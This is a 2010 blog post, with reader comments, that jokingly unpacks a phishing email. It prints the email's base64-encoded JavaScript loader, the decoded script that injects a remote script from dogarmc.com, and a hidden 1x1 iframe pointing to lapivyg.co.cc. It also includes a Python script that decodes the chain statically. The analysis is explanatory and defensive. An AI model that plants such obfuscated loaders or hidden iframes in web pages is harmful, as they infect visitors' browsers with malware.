I Go In, the Crime Begins...

Ten years ago, spam was so painfully obvious that 1/2 second's thought could differentiate it from real email:

DEAR SIR IN CHRIST,
I AM BARR. PONDO. I KNOW YOURESURPRISED TO HEAR FROM ME,I WAS REFERRED....


Then it got slightly more sophisticated:

Dear Subscriber,

Recently, we have had to change all the passwords on your email system....


But today's was even fun. It makes me want to consider taking the story from here to wherever it may go:


Here is the P/O for the van renting in Paris that has been used for the costumes. As I told you, my colleague Francois-Xavier paid for it with his own money. Can I proceed to his reimbursment through the French check book? Thanks for letting me know soon.


It has all the televised marks of a con: it appeals to your greed, it gets you to invest in a false outcome, and it leaves you with a discreetly obfuscated package of no value:

PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZh
c2NyaXB0Ij4NCnZhciBpLHkseD0iMjAyMDIwMjAzYzczNjM3MjY5NzA3NDIw
NzM3MjYzM2QyMjY4NzQ3NDcwM2EyZjJmNjQ2ZjY3NjE3MjZkNjMyZTYzNmY2
ZDJmNjk2NjcyNjE2ZDY1NjY2OTZjNjUyZTZhNzMyMjNlM2MyZjczNjM3MjY5
NzA3NDNlMjAiO3k9Jyc7Zm9yKGk9MDtpPHgubGVuZ3RoO2krPTIpe3krPXVu
ZXNjYXBlKCclJyt4LnN1YnN0cihpLDIpKTt9ZG9jdW1lbnQud3JpdGUoeSk7
DQo8L3NjcmlwdD4=


Which, when base-64 decoded, reveals a JavaScript snippet:

<script language="JavaScript" type="text/javascript">
var i,y,x="202020203c736372697074207372633d22687474703a2f2f646f6761726d632e636f6d2f696672616d6566696c652e6a73223e3c2f7363726970743e20";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);
</script>


Which, in turn, converts the long string from hex pairs to ASCII and writes the result into the page, pulling in a remote script:

<script src="http://dogarmc.com/iframefile.js"></script>

Which, when downloaded, contains unobfuscated JavaScript that opens another (hidden, 1x1) iframe:

document.write("<iframe src='http://lapivyg.co.cc/wiki/index.php?table=img&past=0&p=168&version=boz&pool=off' width='1' height='1' style='visibility: hidden;'></iframe>");
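The whole chain can be unwrapped statically, without executing any of it. Below is an added example (my code, not the author's and not the spammer's): it base64-decodes the blob quoted above, pulls out the hex literal, decodes it the way the loop would, and lists the remote src= targets of both the script and the iframe stages; the only input it assumes is the blob exactly as quoted.

```python
import base64
import re

# Stage 1: the base64 blob quoted in the post, copied as-is (sample input).
STAGE1_B64 = (
    "PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZh"
    "c2NyaXB0Ij4NCnZhciBpLHkseD0iMjAyMDIwMjAzYzczNjM3MjY5NzA3NDIw"
    "NzM3MjYzM2QyMjY4NzQ3NDcwM2EyZjJmNjQ2ZjY3NjE3MjZkNjMyZTYzNmY2"
    "ZDJmNjk2NjcyNjE2ZDY1NjY2OTZjNjUyZTZhNzMyMjNlM2MyZjczNjM3MjY5"
    "NzA3NDNlMjAiO3k9Jyc7Zm9yKGk9MDtpPHgubGVuZ3RoO2krPTIpe3krPXVu"
    "ZXNjYXBlKCclJyt4LnN1YnN0cihpLDIpKTt9ZG9jdW1lbnQud3JpdGUoeSk7"
    "DQo8L3NjcmlwdD4="
)

# The x="..." hex literal that the decoder loop walks two characters at a time.
HEX_LITERAL = re.compile(r'x\s*=\s*"([0-9a-fA-F]+)"')
# Any src='...' / src="..." target in the markup the script would write.
SRC_ATTR = re.compile(r"""src\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE)


def decode_stage1(blob: str) -> str:
    """Base64-decode the wrapper; the line breaks are mail formatting, so drop them."""
    return base64.b64decode("".join(blob.split())).decode("latin-1")


def decode_hex_stage(js: str) -> str:
    """Do statically what unescape('%' + x.substr(i, 2)) does at run time."""
    m = HEX_LITERAL.search(js)
    if m is None:
        raise ValueError("no hex literal of the expected shape in script")
    return bytes.fromhex(m.group(1)).decode("latin-1")


def extract_urls(markup: str) -> list:
    """List every src= target (script or iframe) so it can be blocked or looked up."""
    return SRC_ATTR.findall(markup)


def unpack(blob: str) -> list:
    """Whole chain: base64 -> JS -> hex-decoded markup -> remote URLs, never executed."""
    return extract_urls(decode_hex_stage(decode_stage1(blob)))


if __name__ == "__main__":
    for url in unpack(STAGE1_B64):
        print("remote script pulled in:", url)
```

The same extract_urls() applied to the iframefile.js line above yields the lapivyg.co.cc URL, which is the indicator to block or look up rather than fetch.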

THAT iframe, when checked, gives me a 302 error and sends me to Google's 404 page (here are the headers):


HTTP/1.1 302 Moved Temporarily
< Server: nginx/0.6.32
< Date: Wed, 22 Sep 2010 12:37:24 GMT
< Content-Type: text/html
< Transfer-Encoding: chunked
< Connection: close
< X-Powered-By: PHP/5.2.6-1+lenny4.fpm.4
< Set-Cookie: xyz=1285159044; expires=Wed, 29-Sep-2010 12:37:24 GMT; path=/; domain=lapivyg.co.cc
< Location: http://www.google.com/404/


I'm assuming what it does (besides setting a cookie) is look for a specific type of browser and, assuming it finds the insecure beast, delivers it, instead, the malware payload it is designed to breach.

So, ho-hum. Just another spambot infector.

But what a brave new world to have such mechanisms in it. And I can't stop thinking about that PO box in Paris, and what sort of costumes they may be.

Wait! There's someone at the door. Could it be François Xavier? I'll go see....

EDIT: Jehovah's Witness. Now I'm truly let down...

Comments

tryslora
Sep. 22nd, 2010 10:59 am (UTC)
Sounds like the spam we've been getting bombarded with here... everything from random invoices to queries about family weekends (which got two of our machines because family weekend is coming up as an event in three weeks and we are producing several parts of it *sighs*).
barry_king
Sep. 22nd, 2010 05:31 pm (UTC)
Ah, the lovely, lovely grind of IT.
acwise
Sep. 22nd, 2010 10:03 pm (UTC)
I have a mental image of someone in a gorilla suit, accompanied by someone in a ballerina outfit, driving up in a nondescript van, and demanding a check book.
barry_king
Sep. 23rd, 2010 06:59 am (UTC)
I was thinking Commedia Dell'arte, with all the swooshy big noses, but now you've got me humming out of the Cabaret song book.

Oh, no, wait. That's a gorilla IN a ballerina outfit.